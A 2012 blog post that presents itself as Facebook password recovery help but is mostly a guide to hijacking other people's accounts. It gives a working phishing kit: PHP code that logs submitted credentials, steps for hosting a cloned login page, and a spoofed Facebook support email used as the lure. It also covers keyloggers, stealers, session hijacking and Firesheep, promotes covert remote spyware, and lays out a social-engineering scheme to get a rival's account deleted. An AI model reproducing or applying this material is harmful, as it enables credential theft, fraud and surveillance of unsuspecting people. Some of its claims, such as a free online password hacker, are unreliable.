Thursday, August 16, 2012

Forgot Facebook Password

Forgot Facebook password - How to Hack Facebook Password?

"I forgot my Facebook password and have tried nearly all possible passwords but still can't log in to my Facebook account. How could I hack the Facebook password?"
Facebook is the largest social network with over 600 million users in the world. As a consequence, more and more people ask for Facebook password hack in the Internet. So, in this article, I'm now discovering all the methods used to hack Facebook password.

Method 1: Hack Facebook Password with Primary Email Account

  1. Go to Facebook and click Forgot your Password link.
  2. You'll be taken to a page where you have 3 options to identify your Facebook account. Enter the details you know about the username, email address, phone number or fullname. For example, I can recall my email address and I'll use it to identify my Facebook account. Then click on Search.
    Identify Facebook account
  3. After successful search for the user Facebook will show some information about how many emails are linked to the account. Click Reset Password to continue.
    Reset Facebook password
  4. You'll receive a password reset email from Facebook, including the Password Reset Code. Enter the Password Reset Code and click Submit Code.
    Submit Facebook Password Reset Code
  5. Enter a new password and then confirm it. Click Change Password button.
    Change Facebook password
Now you can log in to your Facebook account with your new password. If you can't get to this point then it sounds like the account is no longer associated with your email address (or you don't have access to that mailbox because, well, it isn't your account).

Method 2: Hack Facebook Password with Password Recovery Tool

Nearly most Web browsers have a pretty nifty password manager, including Internet Explorer, Firefox, Chrome, Safari, Opera. When you login to Facebook, the Web browser offers to save your user name and password. The next time you visit that page, user name and password fields are auto completed for you. A real time-saver.
But have you ever forgotten your Facebook password and need to recover the password saved in your browser? Once you have let your web browser remembers your password, it's quite easy to recover the password with Password Recovery Bundle. Let's take the example of Firefox browser.
  1. Download and install Password Recovery Bundle.
  2. Run Password Recovery Bundle, then click the Start Recovery button. It will bring up a drop-down menu that shows all supported password types.
  3. Select the Firefox Password option.
  4. The program will instantly decrypt the passwords saved in Firefox's password manager, then display the logins and passwords to all your Facebook accounts.
    Recover Facebook password

Facebook Hacking Guide 2012

1) Hack Facebook Online 

 The fastest and easiest way to hack facebook is to use this free online password hacker. It only takes a few minutes and you don't need to download anything. Just type in their persons facebook address, you can get this by going to their profile page and copying the website address, and click the hack facebook password button. If it works, their password will be shown in a textbox below, copy and paste this into the facebook login page and you're done!


2. Facebook Phishing


Phishing is a very popular method for hacking facebook email & passwords. In this attack, hacker creates a phishing page ( fake login ) and will send the URL to his friends and victims. As the victim will enter his email and password, it would send to the hackers email or anywhere in a folder on webhost. Thus, this will hack facebook easily and securely. This method could be detectable by many of the browsers.
Hack Facebook Through Phishing

3. Keylogging

Keylogging is a very easy method for hacking facebook accounts. From my advice, everyone should try this attack as it is very secure and safe. Keylogging is basically related to stealing private information, it is a small program which works invisibly, once it is installed on victim's computer. It would give all the secret information which includes Keystrokes, Emails, Password, bank details including login's active screen. After capturing all the recording this will creates a log file and would invisibly send it to hackers email through Ftp Server. On MHT I have discussed many method of keylogging, I would recommend this method.
Hack Facebook Through Winspy Keylogger

4. Stealers

Nowadays 90% of the hackers use Stealers for hacking accounts. Stealers are the small undetectable programs which captures all the saved passwords from the browser of victims. As majority of peoples used to save their passwords in their browser like Mozilla, Chrome. This thing could be very dangerous due to IStealers.
Hack Facebook Through Stealers

5. Session Hijacking

This Attack could be often very risky if your network is not secured, or if you are using http:// connection. In my previous article i have mentioned how hackers hack through hijacking session. In this method the hack steals the cookies of victim's recent login, which could be very useful for hacking account. So if you want to hack through cookies session hijacking, read my post below.
Hack Facebook With Session Hijacking

6. Sidejacking With Firesheep

This Method is kinda old but some of the hackers mostly use this when their victims or neighbours are on the same network ( Wifi or Shared network ). Firesheep helps hacker from gaining private info and logins through sharing. I will soon make an article upon Firesheep. This method was banned from government due to sharing of network.

7. Mobile Phone Hacking

Business in life is the major problem of every users. So this is why 60% of the facebook Users are running their accounts on their mobile phones, So that this would safe their time. But hackers are hackers, they have build various things from which they can get the user's password whether he is on Mobile or Computer. Now hackers can monitor or spy mobile phones through network or GPRS locator.
The Best Mobile Phone Monito Sofwares are shown below.
1) Mobile-Spy
2) Spy Phone Gold

8. DNS Spoofing

This is a common method mostly used in offices and vacancies for stealing private information like login's and personal data. But this could be used for Facebook Hacking. As the victim using Facebook.com on the same network of the hacker. A hacker could change facebook.com into his phishing page.
Hack Through DNS Spoofing!

9. USB Hacking

The Most Common attack mostly used by relatives and Friends. If your relative has stored Keyloggers and Stealers in his usb, this can be very dangerous as when the victim would connect via Usb Port all the spywares and Viruses will start work on his computer which would be very risky as it would give all the info to the hacker. From My advice a Powerful Firewall and Antivirus Shield should be activated!
Hack Accounts Through USB!

10. Facebook Reverting

The Best and the newest attack mostly used by professional hackers, as they are very genius they can steal accounts through Password recovery and guessing friends, a very clever attack which can change the password of targeted victims to hackers desired password. For more details read below post.
Hack Facebook Through Reverting

11. Facebook Hacking Course

This is a classified facebook hacking course by an ethical hacker Rafay Baloch ( a genius hacker from pakistan ). In this Course you will learn the real hack of facebook hacking. Including above attacks and more professional ways. to get this course Goto :- Here

How To Hack Facebook Account | Phishing

How To Hack Facebook Account | Phishing


In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password
.
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.

action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with

action= “mail.php”

Now open notepad type following code in it and create mail.php.

Code:


<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Now save it as mail.php and create an empty log.txt file. Now you'll need a free web hosting service that supports PHP. Go to http://www.100best-free-web-space.com/ and select service and plan that suits you. Now in root folder of your website create Facebook_files folder and upload all files in Facebook_files of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.

Now sign up with http://www.hoaxmail.co.uk/ it provides spoofed email service. Now create a message from support@facebook.com to your victim.


Sub: Invalid activity on your facebook account

Body:
Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Pleas note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

Countermeasure:
You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.

Firesheep Makes Facebook Hacking Easy

Firesheep Makes Facebook Hacking Easy


25
Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account

What is Session Hijacking?

In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:


Method

1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser


2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep



3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly

Firesheep

Hope you liked the post! Pass the comments

Remote Facebook Hack

Are you looking for the Best Remote password hacking software? Do you need to spy on your remote computer without the need for physical access? But wait! Before you go for any remote spy software you should read our shocking reviews!

1. Sniper Spy (Remote Install Supported)


Editors Rating: 8/10


Remote password hacking softwareSniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!

remote password hacking software


remote password hacking software

SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes
remote password spying software

4. Records any Password (Email, Login, Instant Messenger etc.)

5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall

What if i dont have physical acess to victims computer?


remote password hacking software
 No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.

This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.

The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.

Why would I need SniperSpy?

Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can't get to your computer and are worried about the Internet safety or habits of those using it, then you NEED SniperSpy.

This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).

How to Delete others Facebook Account

Delete facebook accountFacebook is a online world now. People play , talk, enjoy, quarrel and even live inside Facebook nowadays. Usually if this is the height of addiction , for sure this may lead to some new Friends and some new rivals inside Facebook. You might also come across existing rivals inside Facebook, Usually you see your rivals in friends suggestion widget. This is because your rival will surely be having some mutual friends which makes Facebook to suggest them to you.
Its time for you to take revenge against your rivals on Facebook, But how? Isn’t it harsh enough if you delete their Facebook account?

How to delete others Facebook account?

  • To delete someone’s Facebook account follow these steps. It is little long process but surely will work if you act wise enough to fool Facebook team, which is not so hard.
  • Get the Victim’s Facebook Profile Link, which is not so hard.
  • Their Email ID which they use on Facebook.
  • Their Date of Birth, This is the hard part of the trick, But should somehow  manage to get their DOB.
  • Create an Email ID having the Victim’s complete name in it, like Jorge-Bush12345@gmail.com (If the victim’s full name is Jorge Bush).
  • Now open this Facebook Report Link from here.
Facebook report spam
  • Enter the details on this page and submit the report.
  • Now ask any of your friend/friends who is a mutual friend in your rival’s account to report your rival’s profile as spam.
  • You will get a mail after few days on the email ID you created which is similiar to the Victim’s email ID after your report was gone through a manual review. Explain them that you lost the access to your Facebook account and the Email ID associated with it. And try to convince them that a hacker may be using your account now and also making damage to your personality.
  • After this they may ask you for more explanations or if they feel your reply as acceptable, They will delete the account and will mail you as “Your account has been successfully deleted from Facebook, Create a new one from here”.